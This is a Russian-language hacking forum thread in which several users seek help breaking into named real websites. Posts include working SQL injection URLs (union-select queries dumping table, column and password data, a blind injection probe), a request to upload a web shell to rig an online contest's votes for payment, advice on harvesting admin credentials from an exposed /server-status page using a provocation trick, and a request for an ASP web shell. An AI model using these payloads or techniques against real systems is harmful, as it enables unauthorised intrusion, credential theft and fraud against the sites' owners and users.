Всем привет! Кто подскажет,есть сайт ......../wechselbude/index.php?page=content&name=info Если сделать так ......../wechselbude/index.php?page=content&name=(SELECT%20CONCAT(version(),user(),database())) то выводит version 5.1.66-nmm3-log user d01333ce@localhost db d01333ce но дальше вообще никак ни через union ни через and, Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/w00db281/wechselbude/content/content.php on line 6
пытаюсь девочке помочь с хреновым контестом. уверен что саит написан по левому. кто поможет закачать шелл, или пробить SQL иньекцыю чтоб увеличить девочке колво votes? саит; http://whowearsitbetter.com/2july.php помогаю подруге и учусь уму разуму, помошь отблагадорю через paypal.
Я нашел проблему. В файле самого вп. В wp-includes/load.php есть такое: Code: // Escape with wpdb. $_GET = add_magic_quotes( $_GET ); $_POST = add_magic_quotes( $_POST ); $_COOKIE = add_magic_quotes( $_COOKIE ); $_SERVER = add_magic_quotes( $_SERVER ); // Force REQUEST to be GET + POST. $_REQUEST = array_merge( $_GET, $_POST ); и сам код функции add_magic_quotes Code: function add_magic_quotes( $array ) { foreach ( (array) $array as $k => $v ) { if ( is_array( $v ) ) { $array[$k] = add_magic_quotes( $v ); } else { $array[$k] = addslashes( $v ); } } return $array; } Эта фигня портит всю малину. Я так понимаю что тут уже ничего не сделать ?
Есть сайт с открытым /server-status, хочу попытаться выловить авторизацию админа, как это лучше сделать? мб можно как нибудь постоянно парсить все результаты выводимые, и через 1-2 дня к примеру проверить этот список?
Ты только адрес админ-панели максимум выловишь. Не, ну если авторизация идёт через GET - То да, поймаешь аутентификационные данные. А так, максимум - адрес админ панели.
Именно так, запросы и через GET тоже идут. Вот и хотелось бы все эти постояннообновляющиеся запросы куда нибудь логировать или парсить в режиме реального времени, возможно ли это как нибудь сделать?
Ну тебе никто не мешает цеплять на страницу /server-status и парсить её содержимое. Хоть запарся. Единственное что - ты увидешь все запросы как от клиентов, так и от админов, а если сайт высокопосещаемый, то этих запросов будут тысячи, миллионы, сможешь ли ты выловить иголку в стоге сена ??? Самое простое - дождаться когда админ будет в сети, напечатать мат к любой новости и пожаловаться на него. И ждать пока админ его почистит, при этом мониторить /server-status. Если комментарии удаляются через админку - есть шанс увидеть её адрес.
ходел исправить чара и наткнулся вот на это http://wow-cool.ru/?ajaxZone=1&module=chars&action=repair&repairChar=237760&repairRelam=fun что мне с теперь можно с этим делать? это случайно не скуль инъекция? прошу не кидать в меня помидорами т.к. я ещё не очень разбираюсь в этом
ничего,но надежда есть всегда. На сервере стоит форум Invision Power Board 3.4,попробуй в привате сплоит поискать http://forum.wow-cool.ru/admin/upgrade/index.php?app=upgrade&s=§ion=index&do=login
Возможно не сюда запостил ищу веб шел .ASP веб сервер IIS функционал скромный заливка и правка файлов
Можно блиндом получить http://hawk.ru/toto_stat_day.php?n_kogda=20120904%20and%20(select%20ord(substr(@@version,1,1))%20)=53 5.0.51-log
Подскажите: жертва - ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compliance+Audit&id=16 узнаю названия таблиц - ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compliance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() узнаю название столбцов - http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compliance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() на выходе имею такую связку (таблица - user, столбцы - userName,userPass) ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compliance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from users и получаю: Invalid query: Unknown column 'userPass' in 'field list' Уязвимость разбираю из соседнего раздела https://forum.antichat.ru/threadnav21336-1550-10.html - нашел её YaBTR и вот вариант рабочий: ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,group_concat(userpwd,0x3a,user rights),version(),4,5+from+users-- Где и как найти эти userpwd,0x3a,user rights